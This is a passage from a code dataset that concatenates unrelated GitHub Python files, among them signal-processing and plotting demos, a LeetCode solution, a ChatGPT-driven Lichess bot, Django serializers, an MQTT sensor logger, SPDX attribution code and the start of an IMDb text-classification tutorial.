#####################\r\n \r\n summation = 0\r\n for n in range(1, N+1):\r\n index = x[n-1]*(1/math.sqrt(1+δ))*math.cos((math.pi*(2*n-1)*(k-1))/(2*N))\r\n summation += index\r\n DCT.append(math.sqrt(2/N)*summation)\r\n return DCT\r\n\r\n#%% Main Code\r\nif __name__ == \"__main__\":\r\n\r\n data = np.array([0, 0, 0, 20, 0, 0, 0, 0, 0, 20, 50, 20, 0, 0, 0, 7, 50, \r\n 90, 50, 7, 0,0, 0, 20, 50, 20, 0, 0, 0, 0, 0, 20, 0, 0,0])\r\n \r\n plt.figure()\r\n y = dct1D(data, 20)\r\n plt.plot(data, label=\"Original Data\")\r\n plt.plot(y, label=\"Original Data in DCT Space\")\r\n plt.title(\"Discrete Cosine Transform by Lopane\")\r\n plt.legend()\r\n \r\n plt.figure()\r\n y = scipy.fftpack.dct(data, norm=\"ortho\")\r\n plt.plot(data, label=\"Original Data\")\r\n plt.plot(y, label=\"Original Data in DCT Space\")\r\n plt.title(\"Discrete Cosine Transform Using Scipy Library\")\r\n plt.legend()","repo_name":"brianhavk/Python","sub_path":"Discrete Cosine Transform.py","file_name":"Discrete Cosine 
Transform.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72070799527","text":"# 请你将一些箱子装在 一辆卡车 上。给你一个二维数组 boxTypes ,其中 boxTypes[i] = [numberOfBoxesi, \n# numberOfUnitsPerBoxi] : \n# \n# \n# numberOfBoxesi 是类型 i 的箱子的数量。 \n# numberOfUnitsPerBoxi 是类型 i 每个箱子可以装载的单元数量。 \n# \n# \n# 整数 truckSize 表示卡车上可以装载 箱子 的 最大数量 。只要箱子数量不超过 truckSize ,你就可以选择任意箱子装到卡车上。 \n# \n# 返回卡车可以装载 单元 的 最大 总数。 \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:boxTypes = [[1,3],[2,2],[3,1]], truckSize = 4\n# 输出:8\n# 解释:箱子的情况如下:\n# - 1 个第一类的箱子,里面含 3 个单元。\n# - 2 个第二类的箱子,每个里面含 2 个单元。\n# - 3 个第三类的箱子,每个里面含 1 个单元。\n# 可以选择第一类和第二类的所有箱子,以及第三类的一个箱子。\n# 单元总数 = (1 * 3) + (2 * 2) + (1 * 1) = 8 \n# \n# 示例 2: \n# \n# \n# 输入:boxTypes = [[5,10],[2,5],[4,7],[3,9]], truckSize = 10\n# 输出:91\n# \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= boxTypes.length <= 1000 \n# 1 <= numberOfBoxesi, numberOfUnitsPerBoxi <= 1000 \n# 1 <= truckSize <= 10⁶ \n# \n# \n# 👍 98 👎 0\n\nfrom typing import List\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def maximumUnits(self, boxTypes: List[List[int]], truckSize: int) -> int:\n \"\"\"\n 方法1:排序,先装最大的\n \"\"\"\n n = len(boxTypes)\n boxTypes.sort(key=lambda b: b[1], reverse=True)\n res = 0\n temp = 0\n i = 0\n while i < n:\n bt = boxTypes[i]\n num, units = bt[0], bt[1]\n if temp + num <= truckSize:\n temp += num\n res += num * units\n else:\n res += units * (truckSize - temp)\n break\n i += 1\n return res\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n boxTypes = [[1, 3], [2, 2], [3, 1]]\n truckSize = 4\n result = Solution().maximumUnits(boxTypes, truckSize)\n print(result)\n\n boxTypes = [[5, 10], [2, 5], [4, 7], [3, 9]]\n truckSize = 10\n result = Solution().maximumUnits(boxTypes, truckSize)\n print(result)\n","repo_name":"zh805/algorithm","sub_path":"leetcode/python/leetcode/editor/cn/[1710]卡车上的最大单元数.py","file_name":"[1710]卡车上的最大单元数.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2810897993","text":"from Extensions import Extensions\nimport logging\nimport base64\n\ntry:\n import openai\nexcept ImportError:\n import sys\n import subprocess\n\n subprocess.check_call([sys.executable, \"-m\", \"pip\", \"install\", \"openai\"])\n import openai\n\n\nclass dalle(Extensions):\n def __init__(\n self,\n OPENAI_API_KEY: str = \"\",\n **kwargs,\n ):\n self.OPENAI_API_KEY = OPENAI_API_KEY\n if self.OPENAI_API_KEY:\n self.commands = {\n \"Generate Image with DALLE\": self.generate_image_with_dalle\n }\n\n async def generate_image_with_dalle(\n self, prompt: str, filename: str = \"image.png\"\n ) -> str:\n image_path = f\"./WORKSPACE/{filename}\"\n openai.api_key = self.OPENAI_API_KEY\n response = openai.Image.create(\n prompt=prompt,\n n=1,\n size=\"256x256\",\n response_format=\"b64_json\",\n )\n logging.info(f\"Image Generated for prompt:{prompt}\")\n image_data = base64.b64decode(response[\"data\"][0][\"b64_json\"])\n with open(image_path, mode=\"wb\") as png:\n png.write(image_data)\n # REturn base64 image\n encoded_image_data = base64.b64encode(image_data).decode(\"utf-8\")\n return 
f\"#GENERATED_IMAGE:{encoded_image_data}\"\n","repo_name":"Josh-XT/AGiXT","sub_path":"agixt/extensions/dalle.py","file_name":"dalle.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":2174,"dataset":"github-code","pt":"53"} +{"seq_id":"25533718105","text":"wynik=0\r\na=1\r\n\r\nwhile a<4:\r\n x=int(input(\"Podaj liczbę parzystą dodatnią: \"))\r\n if x%2==0 and x>0:\r\n wynik+=x\r\n else:\r\n print(\"Podałeś złą liczbę\")\r\n continue\r\n print(\"Aktualny wynik dodawania to: \",wynik)\r\n a+=1\r\n","repo_name":"sandrakorcz/PYTHON","sub_path":"PYTHON/zadanie10-wyborliczb.py","file_name":"zadanie10-wyborliczb.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13977036837","text":"import os\nimport random\nimport subprocess\nfrom collections import deque\nfrom collections.abc import Callable\n\nimport chess\nimport chess.engine\nimport chess.gaviota\nimport chess.polyglot\nimport chess.syzygy\nfrom chess.variant import find_variant\n\nfrom aliases import DTM, DTZ, Message, Offer_Draw, Outcome, Performance, Resign, UCI_Move\nfrom api import API\nfrom botli_dataclasses import Game_Information\nfrom enums import Game_Status, Variant\n\nfrom ChatChess import ChatChess\n\nclass ChatGPT_Engline: # placeholder engine to use in chat\n def __init__(self):\n self.id = {\"name\": \"ChatGPT using ChatChess\"}\n\nclass Lichess_Game:\n def __init__(self, api: API, game_information: Game_Information, config: dict) -> None:\n self.config = config\n self.api = api\n self.game_info = game_information\n self.white_time_ms = game_information.state['wtime']\n self.black_time_ms = game_information.state['btime']\n self.status = Game_Status(game_information.state['status'])\n self.draw_enabled: bool = config['engine']['offer_draw']['enabled']\n self.resign_enabled: bool = config['engine']['resign']['enabled']\n self.ponder_enabled: bool = True\n self.out_of_book_counter = 0\n self.opening_explorer_counter = 0\n self.out_of_opening_explorer_counter = 0\n self.cloud_counter = 0\n self.out_of_cloud_counter = 0\n self.chessdb_counter = 0\n self.out_of_chessdb_counter = 0\n consecutive_draw_moves = config['engine']['offer_draw']['consecutive_moves']\n self.draw_scores: deque[chess.engine.PovScore] = deque(maxlen=consecutive_draw_moves)\n consecutive_resign_moves = config['engine']['resign']['consecutive_moves']\n self.resign_scores: deque[chess.engine.PovScore] = deque(maxlen=consecutive_resign_moves)\n self.last_message = 'No eval available yet.'\n\n # New / edited variables\n\n self.engine = ChatGPT_Engline()\n self.board = self._setup_board()\n self.bot = self.setupChatGPT()\n\n # ChatGPT functions\n\n def setupChatGPT(self):\n bot = ChatChess.Game(self.config[\"API_key\"])\n bot.maxTokens = self.config[\"GPT_Settings\"][\"Max_tokens\"]\n bot.maxFails = self.config[\"GPT_Settings\"][\"Max_fails\"]\n bot.maxTime = self.config[\"GPT_Settings\"][\"Max_time\"]\n return bot\n\n def make_move(self) -> tuple[UCI_Move, Offer_Draw, Resign]:\n self.bot.board = self.board\n\n resign = False\n\n try:\n self.bot.getGPTMove()\n self.last_message = self.bot.message\n move = self.bot.move[\"ChatGPT\"][\"uci\"]\n except:\n self.last_message = \"ERROR - ChatGPT could not respond\"\n resign = True\n move = self.board.parse_san(str(self.board.legal_moves).split(\"(\")[1].split(\",\")[0])\n\n print(self.last_message)\n\n return move.uci(), False and self.draw_enabled, resign and 
True\n\n def update(self, gameState_event: dict) -> bool:\n self.status = Game_Status(gameState_event['status'])\n\n moves = gameState_event['moves'].split()\n if len(moves) <= len(self.board.move_stack):\n return False\n\n self.board.push(chess.Move.from_uci(moves[-1]))\n self.white_time_ms = gameState_event['wtime']\n self.black_time_ms = gameState_event['btime']\n\n return True\n\n # Other functions\n\n @property\n def is_our_turn(self) -> bool:\n return self.game_info.is_white == self.board.turn\n\n @property\n def is_game_over(self) -> bool:\n return self.board.is_checkmate() or \\\n self.board.is_stalemate() or \\\n self.board.is_insufficient_material() or \\\n self.board.is_fifty_moves() or \\\n self.board.is_repetition()\n\n @property\n def is_abortable(self) -> bool:\n return len(self.board.move_stack) < 2\n\n @property\n def is_finished(self) -> bool:\n return self.status != Game_Status.STARTED\n\n def _setup_board(self) -> chess.Board:\n board = chess.Board() # ChatGPT can only play standard\n\n for uci_move in self.game_info.state['moves'].split():\n board.push_uci(uci_move)\n\n return board\n\n # Functions associated with engine called in other files\n\n def end_game(self) -> None:\n return\n\n def start_pondering(self):\n return\n","repo_name":"Tmate6/Lichess_ChatGPT_ChatBot","sub_path":"lichess_game.py","file_name":"lichess_game.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43630553225","text":"# coding: utf-8\nfrom rest_framework import serializers\n\nfrom project.models import ProjectCourse\nfrom student_course.models import Review, ReviewCourse, ConfirmCourse, ChangeCourseRecord\n\n\nclass ReviewSerializer(serializers.ModelSerializer):\n class Meta:\n model = Review\n fields = ['id', 'student', 'student_server', 'remark', 'create_time', 'modified_time']\n\n\nclass ReviewCourseSerializer(serializers.ModelSerializer):\n class Meta:\n model = ReviewCourse\n fields = ['id', 'course_code', 'student_id', 'course_name', 'school', 'remark', 'review', 'status',\n 'course', 'review_certificate', 'real_name', 'create_time', 'modified_time']\n\n def create(self, validated_data):\n pass\n\n\nclass ConfirmCourseSerializer(serializers.ModelSerializer):\n class Meta:\n model = ConfirmCourse\n fields = ['id', 'course_code', 'course_name', 'school', 'remark', 'student', 'create_time', 'project_course',\n 'score', 'modified_time', 'status', 'convert_status', 'score_enter_time', 'grade', 'image',\n 'recipient_number', 'sending_date']\n\n def to_representation(self, instance):\n data = super().to_representation(instance)\n project_course = data['project_course']\n names = ProjectCourse.objects.filter(id=project_course).values('project__name', 'course__name',\n 'start_time').first()\n data['project_name'] = names['project__name']\n data['real_name'] = names['course__name']\n data['start_time'] = names['start_time']\n return data\n\n\nclass ChangeCourseRecordSerializer(serializers.ModelSerializer):\n class Meta:\n model = ChangeCourseRecord\n fields = ['id', 'student', 'student_server', 'course_code', 'course_name', 'create_time', 'project', 'school',\n 'course', 'modified_time', 'change_type', 'extra']\n","repo_name":"liaochenghao/studentsys","sub_path":"student_course/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74656867687","text":"# 
encoding=utf-8\n\"\"\"\n@Time : 2020/1/10 16:42 \n@Author : LiuYanZhe\n@File : demo2.py\n@Software: PyCharm\n@Description: 极坐标系\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# 数据\nx1 = np.arange(-2 * np.pi, 2 * np.pi, 0.1)\nx2 = np.arange(0, 2 * np.pi, 0.02)\nprint('x2:', x2)\n\n# 创建画布\nfig = plt.figure(figsize=(8, 7)) # 创建一个画板,设定大小,后期添加子图\nfig.subplots_adjust(top=0.95, bottom=0.05) # 设置画板\n# 添加子图\nax1 = fig.add_subplot(2, 2, 1) # 添加一个子图,将画板分成1行5列,该子图为第1个,直角坐标系\nax2 = fig.add_subplot(2, 2, 2, polar=True) # 添加一个子图,横1纵3,第2个,极坐标系\nax3 = fig.add_subplot(2, 2, 3, polar=True) # 添加一个子图,横1纵3,第3个,极坐标系\nax4 = fig.add_subplot(2, 2, 4, polar=True) # 添加一个子图,横1纵3,第3个,极坐标系\n# 绘制\nax1.plot(x1, np.sin(x1))\nax1.plot(x1, np.cos(x1))\nax2.plot(x2, np.ones_like(x2)) # np.ones_like()函数返回1,类型和输入值类型相同\nax2.plot(x2, x2 / 6, linestyle='--', lw=1.5) # lw为线宽\nax3.plot(x2, np.sin(x2), color='b', alpha=0.7, linestyle='-.')\nax3.plot(x2, np.cos(x2), color='g', linestyle=':')\nax4.plot(x2, np.cos(4 * x2))\nax4.plot(x2, np.cos(5 * x2), linestyle='--')\n# 设置子图\nax4.set_rgrids(np.arange(0.1, 2, 0.4), angle=45) # 设置网格\n# ax4.set_yticks(np.arange(0.1, 2, 0.4)) # 与上面效果相同\n# 保存图像\nplt.savefig('./pic/demo2.png', dpi=400, bbox_inches='tight')\n# 显示画布\nplt.show()\n","repo_name":"lyz21/MachineLearning","sub_path":"matplotlib/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6452655022","text":"import paho.mqtt.client as mqttClient\nimport time\nimport datetime\nimport pymysql\n\ndef on_message(client, userdata, message):\n print(\"Inside on_message function\")\n print(\"Message received: \" + str(message.payload.decode(\"utf-8\")))\n\n sql = \"insert into sensor_values(timestamp,sm,wl,n,p,k) values(%s,%s,%s,%s,%s,%s)\"\n\n msg = str(message.payload.decode(\"utf-8\"))\n sensor_values = msg.split(\":\")\n sm = sensor_values[0]\n wl = sensor_values[1]\n n = sensor_values[2]\n p = sensor_values[3]\n k = sensor_values[4]\n timestamp = str(datetime.datetime.now())\n timestamp = timestamp[0:19]\n tuple = (timestamp,sm,wl,n,p,k)\n print(tuple)\n try:\n cursor.execute(sql,tuple)\n db.commit()\n #sleep(20000)\n except e:\n print(\"exception has come\")\n\n print(\"after inserting db record\")\n\n\nbroker_address= \"192.168.0.5\" #Broker address\nport = 1883 #Broker port\n\ndb = pymysql.connect(db=\"smartlab\", user=\"pi\", passwd=\"lunatics@92\",unix_socket=\"/var/run/mysqld/mysqld.sock\")\n\ncursor = db.cursor()\n\nclient = mqttClient.Client(\"edgenode\") #create new instance\nclient.on_message= on_message #attach function to callback\nclient.connect(broker_address, port=port) #connect to broker\n#print(\"Connection established\")\n\nclient.loop_start() #start the loop\n#print(\"After loop start statement\")\nclient.subscribe(\"esp8266\")\n#print(\"After subscribe\")\n\ntry:\n while True:\n time.sleep(60)\n\n\nexcept KeyboardInterrupt:\n print(\"exiting..\")\n db.close()\n client.disconnect()\n client.loop_stop()\n\n\n","repo_name":"shravan002/SIH-2019","sub_path":"sih_fnode_homedir/mqtt_test_v5.py","file_name":"mqtt_test_v5.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19154474563","text":"# function converts from temperature in Celsius to Fahrenheit\r\ndef convert_from_celsius_to_fahrenheit(celsius):\r\n fahrenheit = (celsius * 9 / 5) + 32\r\n return fahrenheit\r\n\r\n\r\n# ask 
the user for current Celsius temperature\r\nprompted_celsius = float(input(\"Enter the Celsius temperature: \"))\r\nfahrenheit_output = convert_from_celsius_to_fahrenheit(prompted_celsius)\r\nprint(\"The temperature in Fahrenheit is: \", fahrenheit_output)\r\n","repo_name":"hiyorijl/applied_calculus_with_python","sub_path":"class 1/2_ fahreinhein.py","file_name":"2_ fahreinhein.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71604507688","text":"from collections import OrderedDict\nimport pytest\nfrom typing import Dict, Tuple, Any\n\nfrom polytropos.actions.translate.__document import DocumentValueProvider\nfrom polytropos.actions.translate.trace.__trace_document import TraceDocumentValueProvider\nfrom polytropos.ontology.track import Track\nfrom polytropos.actions.translate import Translator\n\n@pytest.fixture()\ndef source() -> Tuple[Dict, Dict]:\n doc: Dict = {\n \"first_source_folder\": {\n \"name\": \"Steve\",\n \"color\": \"red\"\n },\n \"second_source_folder\": {\n \"name\": \"Bob\",\n \"color\": \"blue\"\n }\n\n }\n\n spec: Dict = {\n \"source_folder_1\": {\n \"name\": \"first_source_folder\",\n \"data_type\": \"Folder\",\n \"sort_order\": 0\n },\n \"source_name_1\": {\n \"name\": \"name\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_1\",\n \"sort_order\": 0\n },\n \"source_color_1\": {\n \"name\": \"color\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_1\",\n \"sort_order\": 1\n },\n \"source_folder_2\": {\n \"name\": \"second_source_folder\",\n \"data_type\": \"Folder\",\n \"sort_order\": 1\n },\n \"source_name_2\": {\n \"name\": \"name\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_2\",\n \"sort_order\": 0\n },\n \"source_color_2\": {\n \"name\": \"color\",\n \"data_type\": \"Text\",\n \"parent\": \"source_folder_2\",\n \"sort_order\": 1\n },\n\n }\n return spec, doc\n\n@pytest.fixture\ndef target() -> Tuple[Dict, Tuple[\"OrderedDict[str, Any]\", \"OrderedDict[str, Any]\"]]:\n translate_doc: OrderedDict[str, Any] = OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"Steve\"),\n (\"color\", \"red\")\n ]),\n OrderedDict([\n (\"name\", \"Bob\"),\n (\"color\", \"blue\")\n ])\n ])\n ])\n\n trace_doc: OrderedDict[str, Any] = OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"source_name_1\"),\n (\"color\", \"source_color_1\")\n ]),\n OrderedDict([\n (\"name\", \"source_name_2\"),\n (\"color\", \"source_color_2\")\n ])\n ])\n ])\n\n spec: Dict = {\n \"target_list\": {\n \"name\": \"the_list\",\n \"data_type\": \"List\",\n \"sort_order\": 0,\n \"sources\": [\"source_folder_1\", \"source_folder_2\"],\n },\n \"target_list_name\": {\n \"name\": \"name\",\n \"data_type\": \"Text\",\n \"parent\": \"target_list\",\n \"sort_order\": 0,\n \"sources\": [\"source_name_1\", \"source_name_2\"]\n },\n \"target_list_color\": {\n \"name\": \"color\",\n \"data_type\": \"Text\",\n \"parent\": \"target_list\",\n \"sort_order\": 1,\n \"sources\": [\"source_color_1\", \"source_color_2\"]\n }\n }\n\n return spec, (translate_doc, trace_doc)\n\n\n@pytest.mark.parametrize(\n \"index, create_document_value_provider\", enumerate([DocumentValueProvider, TraceDocumentValueProvider])\n)\ndef test_list_from_folders(source, target, index, create_document_value_provider):\n source_spec, source_doc = source\n target_spec, expected = target\n source_track: Track = Track.build(source_spec, None, \"Source\")\n target_track: Track = 
Track.build(target_spec, source_track, \"Target\")\n translate: Translator = Translator(target_track, create_document_value_provider)\n actual: OrderedDict[str, Any] = translate(\"composite_id\", \"period\", source_doc)\n assert actual == expected[index]\n\n\n@pytest.mark.parametrize(\n \"create_document_value_provider, expected\", [\n (DocumentValueProvider, OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"Steve\"),\n (\"color\", \"red\")\n ])\n ])\n ])),\n (TraceDocumentValueProvider, OrderedDict([\n (\"the_list\", [\n OrderedDict([\n (\"name\", \"source_name_1\"),\n (\"color\", \"source_color_1\")\n ])\n ])\n ]))]\n)\ndef test_folder_null_skipped(source, target, create_document_value_provider, expected):\n \"\"\"On occasion, e-files contain that would normally contain list items. These are converted to\n JSON as {\"EmptyElement\": null} and are not included as list items during translation.\"\"\"\n source_spec, source_doc = source\n source_doc[\"second_source_folder\"] = None\n target_spec, _ = target\n source_track: Track = Track.build(source_spec, None, \"Source\")\n target_track: Track = Track.build(target_spec, source_track, \"Target\")\n translate: Translator = Translator(target_track, create_document_value_provider)\n actual: OrderedDict[str, Any] = translate(\"composite_id\", \"period\", source_doc)\n assert actual == expected\n","repo_name":"borenstein/polytropos","sub_path":"test/test_functional/translate/test_10_list_from_folders_test.py","file_name":"test_10_list_from_folders_test.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"20383336398","text":"# -- IF Statements --\n# Similar indenting notation to for loops\n# if, elif, else\n\n\ncars = ['audi', 'bmw', 'subaru', 'toyota']\n\n# for car in cars:\n# \tif len(car) == 3:\n# \t\tprint(f'{car.title()} has 3 letters!')\n# \telse:\n# \t\tprint(f'{car.title()} does not have 3 letters!')\n\n# Case is taken into account when comparing\ncar = 'Audi'\n# car == 'audi' // => False\n\n# and = &&\n# or = ||\n\nband_users = ['Tim', 'Bill', 'Jessica']\n# if 'Christian' not in band_users:\n# \tprint(f'Christian is safe to go in!')\n\n# If vs. 
elif\n# \t- Multiple if's will test all conditions\n# \t- Multiple elif's will stop at the first met condition\n\nempty_list = []\n# if empty_list:\n# \tprint('list is not empty')\n# if not empty_list:\n# \tprint('list is empty')","repo_name":"SenseiCain/python_crash_course","sub_path":"syntax/if_statements.py","file_name":"if_statements.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"253288988","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day18 2021\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom functools import reduce\nfrom itertools import permutations\n\ndef parse(data):\n flatlist = []\n for line in data:\n flatline, depth = [], 0\n for c in line:\n if c == '[':\n depth += 1\n elif c == ']':\n depth -= 1\n elif c.isdigit():\n flatline.append([int(c), depth])\n flatlist.append(flatline)\n return flatlist\n\ndef split(pair):\n for i, (num, depth) in enumerate(pair):\n if num < 10:\n continue\n down = num // 2\n up = num - down\n return True, pair[:i] + [[down, depth+1],[up, depth+1]] + pair[i+1:]\n return False, pair\n\ndef explode(pair):\n for i, ((num1, depth1), (num2, depth2)) in enumerate(zip(pair, pair[1:])):\n if depth1 < 5 or depth1 != depth2:\n continue\n if i > 0:\n pair[i - 1][0] += num1\n if i < len(pair) - 2:\n pair[i + 2][0] += num2\n return True, pair[:i] + [[0, depth1 - 1]] + pair[i + 2:] \n return False, pair\n\ndef add(a, b):\n pair = [[num, depth+1] for num,depth in a + b]\n while True:\n change, pair = explode(pair)\n if change:\n continue\n change,pair = split(pair)\n if not change:\n break\n return pair\n\ndef magnitude(pair):\n while len(pair) > 1:\n for i, ((num1, depth1), (num2, depth2)) in enumerate(zip(pair, pair[1:])):\n if depth1 != depth2:\n continue\n val = num1 * 3 + num2 * 2\n pair = pair[:i]+[[val, depth1-1]]+pair[i+2:]\n break\n return pair[0][0]\n\nflatlist = parse(data)\n# pt 1\nprint(magnitude(reduce(add, flatlist)))\n# pt 2\nprint(max(magnitude(add(a, b)) for a, b in permutations(flatlist, 2)))\n","repo_name":"gmnr/advent-of-code","sub_path":"2021/18/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7308669408","text":"from io import StringIO\nfrom typing import Optional\n\nfrom spdx_tools.spdx.model.document import CreationInfo\nfrom spdx_tools.spdx.model.file import File\nfrom spdx_tools.spdx.model.package import Package\nfrom spdx_tools.spdx.model.snippet import Snippet\nfrom spdx_tools.spdx.writer.tagvalue.creation_info_writer import write_creation_info\nfrom spdx_tools.spdx.writer.tagvalue.file_writer import write_file\nfrom spdx_tools.spdx.writer.tagvalue.package_writer import write_package\nfrom spdx_tools.spdx.writer.tagvalue.snippet_writer import write_snippet\n\nfrom opossum_lib.constants import (\n PURL,\n SPDX_FILE_IDENTIFIER,\n SPDX_PACKAGE_IDENTIFIER,\n SPDX_SNIPPET_IDENTIFIER,\n)\nfrom opossum_lib.opossum_file import OpossumPackage, SourceInfo\n\n\ndef _get_purl(package: Package) -> Optional[str]:\n for external_reference in package.external_references:\n if external_reference.reference_type == PURL:\n return external_reference.locator\n return None\n\n\ndef create_package_attribution(package: Package) -> OpossumPackage:\n package_data = StringIO()\n write_package(package, 
package_data)\n source = SourceInfo(SPDX_PACKAGE_IDENTIFIER)\n package_attribution = OpossumPackage(\n source=source,\n packageName=package.name,\n url=str(package.download_location),\n packageVersion=package.version,\n packagePURLAppendix=_get_purl(package),\n copyright=str(package.copyright_text),\n comment=package_data.getvalue(),\n licenseName=str(package.license_concluded),\n )\n\n return package_attribution\n\n\ndef create_file_attribution(file: File) -> OpossumPackage:\n file_data = StringIO()\n write_file(file, file_data)\n source = SourceInfo(SPDX_FILE_IDENTIFIER)\n file_attribution = OpossumPackage(\n source=source,\n packageName=file.name.split(\"/\")[-1],\n copyright=str(file.copyright_text),\n comment=file_data.getvalue(),\n licenseName=str(file.license_concluded),\n )\n return file_attribution\n\n\ndef create_snippet_attribution(snippet: Snippet) -> OpossumPackage:\n snippet_data = StringIO()\n write_snippet(snippet, snippet_data)\n source = SourceInfo(SPDX_SNIPPET_IDENTIFIER)\n snippet_attribution = OpossumPackage(\n source=source,\n packageName=snippet.name,\n copyright=str(snippet.copyright_text),\n comment=snippet_data.getvalue(),\n licenseName=str(snippet.license_concluded),\n )\n\n return snippet_attribution\n\n\ndef create_document_attribution(\n creation_info: CreationInfo,\n) -> OpossumPackage:\n creation_info_data = StringIO()\n write_creation_info(creation_info, creation_info_data)\n source = SourceInfo(creation_info.spdx_id)\n document_attribution = OpossumPackage(\n source=source,\n packageName=creation_info.name,\n licenseName=creation_info.data_license,\n comment=creation_info_data.getvalue(),\n )\n\n return document_attribution\n","repo_name":"opossum-tool/opossum.lib.py","sub_path":"src/opossum_lib/attribution_generation.py","file_name":"attribution_generation.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24329735907","text":"from django.test import TestCase\nfrom django.urls import reverse, resolve\nfrom pages.views import index, about \n\nclass TestUrls(TestCase):\n\n def test_home_page_status_code(self):\n url = reverse('index')\n print(resolve(url))\n self.assertEquals(resolve(url).func, index)\n\n def test_about_page_status_code(self):\n url = reverse('about')\n print(resolve(url))\n self.assertEquals(resolve(url).func,about)\n\n","repo_name":"Miirkey/mycake_project","sub_path":"mycake/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18524901583","text":"# dict is used to store key:value pairs \ndef list_to_dict():\n keys = [1,2,3]\n values = [\"a\", \"b\", \"c\"]\n result=dict(zip(keys, values))\n print(result)\n\ndef l_to_d():\n k=[1,2,3]\n v=[\"a\", \"b\", \"c\"]\n r=dict(zip(k,v))\n print(r)\n\n#list_to_dict()\nl_to_d()\n\n\n# tuple is a collection of objects separated by comma\ndef dict_to_tuple():\n d={1: 'a', 2: 'b', 3: 'c'}\n for i in d.items():\n print(i)\n\ndict_to_tuple()","repo_name":"feimvnc/ml-python","sub_path":"exercises/list_to_dict/list_to_dict.py","file_name":"list_to_dict.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74112335848","text":"from datasets import load_dataset, load_metric\n\n# 每个数据集都由一个文本特征(评论的文本)和一个标签特征(表示评论的好坏)组成。\ntask = \"imdb\"\n\ndataset = 
load_dataset(task)\n\nprint(dataset)\n\"\"\"\nDatasetDict({\n train: Dataset({\n features: ['text', 'label'],\n num_rows: 25000\n })\n test: Dataset({\n features: ['text', 'label'],\n num_rows: 25000\n })\n unsupervised: Dataset({\n features: ['text', 'label'],\n num_rows: 50000\n })\n})\n\"\"\"\n\n\n########################\n\n# IMDb数据集的通用基准指标是准确率,所以这里使用 datasets 库的 load_metric 函数来加载 metric 脚本,稍后可以与 compute 方法一起使用。\nmetric = load_metric(\"accuracy\")\n\nmetric.compute(predictions=[0,0,1,1], references=[0,1,1,1])\n# {'accuracy': 0.75}\n\n\n########################\n# 下载的数据集有训练和测试拆分,但我们还需要拆分出验证集来判断模型在训练期间表现以避免过拟合。\n#\n# 使用train_test_split 应用于 test_size = 0.3 进行拆分:这会产生一个包含 70% 原始样本的新训练集和一个包含 30% 原始样本的验证集。\nsplitted_datasets = dataset[\"train\"].train_test_split(test_size=0.3)\nprint(splitted_datasets)\n\"\"\"\nDatasetDict({\n train: Dataset({\n features: ['text', 'label'],\n num_rows: 17500\n })\n test: Dataset({\n features: ['text', 'label'],\n num_rows: 7500\n })\n})\n\"\"\"\n\n# 接下来使用 Hugging Face的AutoTokenizer 类加载 BERT Tokenizer。\n#\n# 本文实际上加载 DistilBERT 作为 快速替代方案,如果需要加载 BERT,代码基本是相同的(即将 distilbert-base-uncased 替换为 Bert-base-uncased)。\n# DistilBERT 是一种小型、快速、廉价和轻量级的 Transformer 模型,通过蒸馏 BERT 基础进行训练。\n# 根据 GLUE 语言理解基准测试,它的参数比 Bert-base-uncased 少 40%,运行速度提高 60%,同时保持 BERT 95% 以上的性能。\n\n\n\nfrom transformers import AutoTokenizer\n\nmodel_checkpoint = \"distilbert-base-uncased\"\n\n# use_fast: Whether or not to try to load the fast version of the tokenizer.\n# Most of the tokenizers are available in two flavors: a full python\n# implementation and a “Fast” implementation based on the Rust library 